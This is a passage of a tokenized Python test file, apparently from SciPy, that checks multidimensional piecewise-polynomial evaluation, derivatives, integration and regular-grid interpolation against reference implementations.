) ) <EOL> for nu in ( None , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:2> ) ) : <EOL> v1 = p ( ( xi , yi , zi ) , nu = nu ) <EOL> v2 = _ppoly3d_eval ( c , ( x , y , z ) , xi , yi , zi , nu = nu ) <EOL> assert_allclose ( v1 , v2 , err_msg = repr ( nu ) ) <EOL> def test_simple_4d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:10> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> u = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:11> + <NUM_LIT:1> ) ** <NUM_LIT:4> <EOL> xi = np . random . rand ( <NUM_LIT:20> ) <EOL> yi = np . random . rand ( <NUM_LIT:20> ) <EOL> zi = np . random . rand ( <NUM_LIT:20> ) <EOL> ui = np . random . rand ( <NUM_LIT:20> ) <EOL> p = NdPPoly ( c , ( x , y , z , u ) ) <EOL> v1 = p ( ( xi , yi , zi , ui ) ) <EOL> v2 = _ppoly4d_eval ( c , ( x , y , z , u ) , xi , yi , zi , ui ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_deriv_1d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> + <NUM_LIT:1> ) <EOL> p = NdPPoly ( c , ( x , ) ) <EOL> dp = p . derivative ( nu = [ <NUM_LIT:1> ] ) <EOL> p1 = PPoly ( c , x ) <EOL> dp1 = p1 . derivative ( ) <EOL> assert_allclose ( dp . c , dp1 . c ) <EOL> dp = p . antiderivative ( nu = [ <NUM_LIT:2> ] ) <EOL> p1 = PPoly ( c , x ) <EOL> dp1 = p1 . antiderivative ( <NUM_LIT:2> ) <EOL> assert_allclose ( dp . c , dp1 . c ) <EOL> def test_deriv_3d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> p = NdPPoly ( c , ( x , y , z ) ) <EOL> p1 = PPoly ( c . transpose ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) , x ) <EOL> dp = p . derivative ( nu = [ <NUM_LIT:2> ] ) <EOL> dp1 = p1 . derivative ( <NUM_LIT:2> ) <EOL> assert_allclose ( dp . c , <EOL> dp1 . c . transpose ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> p1 = PPoly ( c . transpose ( <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) , y ) <EOL> dp = p . antiderivative ( nu = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> dp1 = p1 . antiderivative ( <NUM_LIT:1> ) <EOL> assert_allclose ( dp . c , <EOL> dp1 . c . transpose ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> p1 = PPoly ( c . transpose ( <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ) , z ) <EOL> dp = p . derivative ( nu = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] ) <EOL> dp1 = p1 . derivative ( <NUM_LIT:3> ) <EOL> assert_allclose ( dp . c , <EOL> dp1 . c . transpose ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> def test_deriv_3d_simple ( self ) : <EOL> c = np . ones ( ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> + <NUM_LIT:1> ) ** <NUM_LIT:1> <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> p = NdPPoly ( c , ( x , y , z ) ) <EOL> ip = p . antiderivative ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> ) ) <EOL> ip = ip . antiderivative ( ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> xi = np . random . rand ( <NUM_LIT:20> ) <EOL> yi = np . random . rand ( <NUM_LIT:20> ) <EOL> zi = np . random . rand ( <NUM_LIT:20> ) <EOL> assert_allclose ( ip ( ( xi , yi , zi ) ) , <EOL> xi * yi ** <NUM_LIT:2> * zi ** <NUM_LIT:4> / ( gamma ( <NUM_LIT:3> ) * gamma ( <NUM_LIT:5> ) ) ) <EOL> def test_integrate_2d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:16> , <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:16> + <NUM_LIT:1> ) ** <NUM_LIT:1> <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> c = c . transpose ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> cx = c . reshape ( c . shape [ <NUM_LIT:0> ] , c . shape [ <NUM_LIT:1> ] , - <NUM_LIT:1> ) . copy ( ) <EOL> _ppoly . fix_continuity ( cx , x , <NUM_LIT:2> ) <EOL> c = cx . reshape ( c . shape ) <EOL> c = c . transpose ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> c = c . transpose ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> cx = c . reshape ( c . shape [ <NUM_LIT:0> ] , c . shape [ <NUM_LIT:1> ] , - <NUM_LIT:1> ) . copy ( ) <EOL> _ppoly . fix_continuity ( cx , y , <NUM_LIT:2> ) <EOL> c = cx . reshape ( c . shape ) <EOL> c = c . transpose ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> ) . copy ( ) <EOL> p = NdPPoly ( c , ( x , y ) ) <EOL> for ranges in [ [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ] , <EOL> [ ( <NUM_LIT:0> , <NUM_LIT:0.5> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ] , <EOL> [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:0.5> ) ] , <EOL> [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] ] : <EOL> ig = p . integrate ( ranges ) <EOL> ig2 , err2 = nquad ( lambda x , y : p ( ( x , y ) ) , ranges , <EOL> opts = [ dict ( epsrel = <NUM_LIT> , epsabs = <NUM_LIT> ) ] * <NUM_LIT:2> ) <EOL> assert_allclose ( ig , ig2 , rtol = <NUM_LIT> , atol = <NUM_LIT> , <EOL> err_msg = repr ( ranges ) ) <EOL> def test_integrate_1d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:16> + <NUM_LIT:1> ) ** <NUM_LIT:1> <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> p = NdPPoly ( c , ( x , y , z ) ) <EOL> u = np . random . rand ( <NUM_LIT:200> ) <EOL> v = np . random . rand ( <NUM_LIT:200> ) <EOL> a , b = <NUM_LIT> , <NUM_LIT> <EOL> px = p . integrate_1d ( a , b , axis = <NUM_LIT:0> ) <EOL> pax = p . antiderivative ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> assert_allclose ( px ( ( u , v ) ) , pax ( ( b , u , v ) ) - pax ( ( a , u , v ) ) ) <EOL> py = p . integrate_1d ( a , b , axis = <NUM_LIT:1> ) <EOL> pay = p . antiderivative ( ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> assert_allclose ( py ( ( u , v ) ) , pay ( ( u , b , v ) ) - pay ( ( u , a , v ) ) ) <EOL> pz = p . integrate_1d ( a , b , axis = <NUM_LIT:2> ) <EOL> paz = p . antiderivative ( ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> assert_allclose ( pz ( ( u , v ) ) , paz ( ( u , v , b ) ) - paz ( ( u , v , a ) ) ) <EOL> def _ppoly_eval_1 ( c , x , xps ) : <EOL> """<STR_LIT>""" <EOL> out = np . zeros ( ( len ( xps ) , c . shape [ <NUM_LIT:2> ] ) ) <EOL> for i , xp in enumerate ( xps ) : <EOL> if xp < <NUM_LIT:0> or xp > <NUM_LIT:1> : <EOL> out [ i , : ] = np . nan <EOL> continue <EOL> j = np . searchsorted ( x , xp ) - <NUM_LIT:1> <EOL> d = xp - x [ j ] <EOL> assert_ ( x [ j ] <= xp < x [ j + <NUM_LIT:1> ] ) <EOL> r = sum ( c [ k , j ] * d ** ( c . shape [ <NUM_LIT:0> ] - k - <NUM_LIT:1> ) <EOL> for k in range ( c . shape [ <NUM_LIT:0> ] ) ) <EOL> out [ i , : ] = r <EOL> return out <EOL> def _ppoly_eval_2 ( coeffs , breaks , xnew , fill = np . nan ) : <EOL> """<STR_LIT>""" <EOL> a = breaks [ <NUM_LIT:0> ] <EOL> b = breaks [ - <NUM_LIT:1> ] <EOL> K = coeffs . shape [ <NUM_LIT:0> ] <EOL> saveshape = np . shape ( xnew ) <EOL> xnew = np . ravel ( xnew ) <EOL> res = np . empty_like ( xnew ) <EOL> mask = ( xnew >= a ) & ( xnew <= b ) <EOL> res [ ~ mask ] = fill <EOL> xx = xnew . compress ( mask ) <EOL> indxs = np . searchsorted ( breaks , xx ) - <NUM_LIT:1> <EOL> indxs = indxs . clip ( <NUM_LIT:0> , len ( breaks ) ) <EOL> pp = coeffs <EOL> diff = xx - breaks . take ( indxs ) <EOL> V = np . vander ( diff , N = K ) <EOL> values = np . array ( [ np . dot ( V [ k , : ] , pp [ : , indxs [ k ] ] ) for k in xrange ( len ( xx ) ) ] ) <EOL> res [ mask ] = values <EOL> res . shape = saveshape <EOL> return res <EOL> def _dpow ( x , y , n ) : <EOL> """<STR_LIT>""" <EOL> if n < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif n > y : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return poch ( y - n + <NUM_LIT:1> , n ) * x ** ( y - n ) <EOL> def _ppoly2d_eval ( c , xs , xnew , ynew , nu = None ) : <EOL> """<STR_LIT>""" <EOL> if nu is None : <EOL> nu = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> out = np . empty ( ( len ( xnew ) , ) , dtype = c . dtype ) <EOL> nx , ny = c . shape [ : <NUM_LIT:2> ] <EOL> for jout , ( x , y ) in enumerate ( zip ( xnew , ynew ) ) : <EOL> if not ( ( xs [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <= x <= xs [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <= y <= xs [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] ) ) : <EOL> out [ jout ] = np . nan <EOL> continue <EOL> j1 = np . searchsorted ( xs [ <NUM_LIT:0> ] , x ) - <NUM_LIT:1> <EOL> j2 = np . searchsorted ( xs [ <NUM_LIT:1> ] , y ) - <NUM_LIT:1> <EOL> s1 = x - xs [ <NUM_LIT:0> ] [ j1 ] <EOL> s2 = y - xs [ <NUM_LIT:1> ] [ j2 ] <EOL> val = <NUM_LIT:0> <EOL> for k1 in range ( c . shape [ <NUM_LIT:0> ] ) : <EOL> for k2 in range ( c . shape [ <NUM_LIT:1> ] ) : <EOL> val += ( c [ nx - k1 - <NUM_LIT:1> , ny - k2 - <NUM_LIT:1> , j1 , j2 ] <EOL> * _dpow ( s1 , k1 , nu [ <NUM_LIT:0> ] ) <EOL> * _dpow ( s2 , k2 , nu [ <NUM_LIT:1> ] ) ) <EOL> out [ jout ] = val <EOL> return out <EOL> def _ppoly3d_eval ( c , xs , xnew , ynew , znew , nu = None ) : <EOL> """<STR_LIT>""" <EOL> if nu is None : <EOL> nu = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> out = np . empty ( ( len ( xnew ) , ) , dtype = c . dtype ) <EOL> nx , ny , nz = c . shape [ : <NUM_LIT:3> ] <EOL> for jout , ( x , y , z ) in enumerate ( zip ( xnew , ynew , znew ) ) : <EOL> if not ( ( xs [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <= x <= xs [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <= y <= xs [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] <= z <= xs [ <NUM_LIT:2> ] [ - <NUM_LIT:1> ] ) ) : <EOL> out [ jout ] = np . nan <EOL> continue <EOL> j1 = np . searchsorted ( xs [ <NUM_LIT:0> ] , x ) - <NUM_LIT:1> <EOL> j2 = np . searchsorted ( xs [ <NUM_LIT:1> ] , y ) - <NUM_LIT:1> <EOL> j3 = np . searchsorted ( xs [ <NUM_LIT:2> ] , z ) - <NUM_LIT:1> <EOL> s1 = x - xs [ <NUM_LIT:0> ] [ j1 ] <EOL> s2 = y - xs [ <NUM_LIT:1> ] [ j2 ] <EOL> s3 = z - xs [ <NUM_LIT:2> ] [ j3 ] <EOL> val = <NUM_LIT:0> <EOL> for k1 in range ( c . shape [ <NUM_LIT:0> ] ) : <EOL> for k2 in range ( c . shape [ <NUM_LIT:1> ] ) : <EOL> for k3 in range ( c . shape [ <NUM_LIT:2> ] ) : <EOL> val += ( c [ nx - k1 - <NUM_LIT:1> , ny - k2 - <NUM_LIT:1> , nz - k3 - <NUM_LIT:1> , j1 , j2 , j3 ] <EOL> * _dpow ( s1 , k1 , nu [ <NUM_LIT:0> ] ) <EOL> * _dpow ( s2 , k2 , nu [ <NUM_LIT:1> ] ) <EOL> * _dpow ( s3 , k3 , nu [ <NUM_LIT:2> ] ) ) <EOL> out [ jout ] = val <EOL> return out <EOL> def _ppoly4d_eval ( c , xs , xnew , ynew , znew , unew , nu = None ) : <EOL> """<STR_LIT>""" <EOL> if nu is None : <EOL> nu = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> out = np . empty ( ( len ( xnew ) , ) , dtype = c . dtype ) <EOL> mx , my , mz , mu = c . shape [ : <NUM_LIT:4> ] <EOL> for jout , ( x , y , z , u ) in enumerate ( zip ( xnew , ynew , znew , unew ) ) : <EOL> if not ( ( xs [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <= x <= xs [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <= y <= xs [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] <= z <= xs [ <NUM_LIT:2> ] [ - <NUM_LIT:1> ] ) and <EOL> ( xs [ <NUM_LIT:3> ] [ <NUM_LIT:0> ] <= u <= xs [ <NUM_LIT:3> ] [ - <NUM_LIT:1> ] ) ) : <EOL> out [ jout ] = np . nan <EOL> continue <EOL> j1 = np . searchsorted ( xs [ <NUM_LIT:0> ] , x ) - <NUM_LIT:1> <EOL> j2 = np . searchsorted ( xs [ <NUM_LIT:1> ] , y ) - <NUM_LIT:1> <EOL> j3 = np . searchsorted ( xs [ <NUM_LIT:2> ] , z ) - <NUM_LIT:1> <EOL> j4 = np . searchsorted ( xs [ <NUM_LIT:3> ] , u ) - <NUM_LIT:1> <EOL> s1 = x - xs [ <NUM_LIT:0> ] [ j1 ] <EOL> s2 = y - xs [ <NUM_LIT:1> ] [ j2 ] <EOL> s3 = z - xs [ <NUM_LIT:2> ] [ j3 ] <EOL> s4 = u - xs [ <NUM_LIT:3> ] [ j4 ] <EOL> val = <NUM_LIT:0> <EOL> for k1 in range ( c . shape [ <NUM_LIT:0> ] ) : <EOL> for k2 in range ( c . shape [ <NUM_LIT:1> ] ) : <EOL> for k3 in range ( c . shape [ <NUM_LIT:2> ] ) : <EOL> for k4 in range ( c . shape [ <NUM_LIT:3> ] ) : <EOL> val += ( c [ mx - k1 - <NUM_LIT:1> , my - k2 - <NUM_LIT:1> , mz - k3 - <NUM_LIT:1> , mu - k4 - <NUM_LIT:1> , j1 , j2 , j3 , j4 ] <EOL> * _dpow ( s1 , k1 , nu [ <NUM_LIT:0> ] ) <EOL> * _dpow ( s2 , k2 , nu [ <NUM_LIT:1> ] ) <EOL> * _dpow ( s3 , k3 , nu [ <NUM_LIT:2> ] ) <EOL> * _dpow ( s4 , k4 , nu [ <NUM_LIT:3> ] ) ) <EOL> out [ jout ] = val <EOL> return out <EOL> class TestRegularGridInterpolator ( TestCase ) : <EOL> def _get_sample_4d ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] * <NUM_LIT:4> <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis , np . newaxis , np . newaxis ] <EOL> values1 = values [ np . newaxis , : , np . newaxis , np . newaxis ] <EOL> values2 = values [ np . newaxis , np . newaxis , : , np . newaxis ] <EOL> values3 = values [ np . newaxis , np . newaxis , np . newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> + values2 * <NUM_LIT:100> + values3 * <NUM_LIT:1000> ) <EOL> return points , values <EOL> def _get_sample_4d_2 ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] * <NUM_LIT:2> + [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> ) ] * <NUM_LIT:2> <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis , np . newaxis , np . newaxis ] <EOL> values1 = values [ np . newaxis , : , np . newaxis , np . newaxis ] <EOL> values2 = values [ np . newaxis , np . newaxis , : , np . newaxis ] <EOL> values3 = values [ np . newaxis , np . newaxis , np . newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> + values2 * <NUM_LIT:100> + values3 * <NUM_LIT:1000> ) <EOL> return points , values <EOL> def test_list_input ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> interp = RegularGridInterpolator ( points , <EOL> values . tolist ( ) , <EOL> method = method ) <EOL> v1 = interp ( sample . tolist ( ) ) <EOL> interp = RegularGridInterpolator ( points , <EOL> values , <EOL> method = method ) <EOL> v2 = interp ( sample ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_complex ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> values = values - <NUM_LIT> * values <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> interp = RegularGridInterpolator ( points , values , <EOL> method = method ) <EOL> rinterp = RegularGridInterpolator ( points , values . real , <EOL> method = method ) <EOL> iinterp = RegularGridInterpolator ( points , values . imag , <EOL> method = method ) <EOL> v1 = interp ( sample ) <EOL> v2 = rinterp ( sample ) + <NUM_LIT> * iinterp ( sample ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_linear_xi1d ( self ) : <EOL> points , values = self . _get_sample_4d_2 ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_linear_xi3d ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_nearest ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , method = "<STR_LIT>" ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:0.1> ] ) <EOL> wanted = <NUM_LIT:0.> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ) <EOL> wanted = <NUM_LIT:0.> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . asarray ( [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> sample = np . asarray ( [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> wanted = <NUM_LIT> <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_linear_edges ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , wanted ) <EOL> def test_valid_create ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> ) ] <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis ] <EOL> values1 = values [ np . newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> ) <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values ) <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) , ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] <EOL> assert_raises ( ValueError , RegularGridInterpolator , points , values , <EOL> method = "<STR_LIT>" ) <EOL> def test_valid_call ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ] ) <EOL> assert_raises ( ValueError , interp , sample , "<STR_LIT>" ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ] ) <EOL> assert_raises ( ValueError , interp , sample ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT> ] ] ) <EOL> assert_raises ( ValueError , interp , sample ) <EOL> def test_out_of_bounds_extrap ( self ) : <EOL> points , values = self . _get_sample_4d ( ) <EOL> interp = RegularGridInterpolator ( points , values , bounds_error = False , <EOL> fill_value = None ) <EOL> sample = np . asarray ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:11> ] , [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ] ) <EOL> wanted = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> wanted = np . asarray ( [ - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] ) <EOL> assert_array_almost_equal ( interp ( sample , method = "<STR_LIT>" ) , wanted ) <EOL> def test_out_of_bounds_extrap2 ( self ) : <EOL> points , values = self . _get_sample_4d_2 ( ) <EOL> interp = RegularGridInterpolator ( points , values , bounds_error = False , 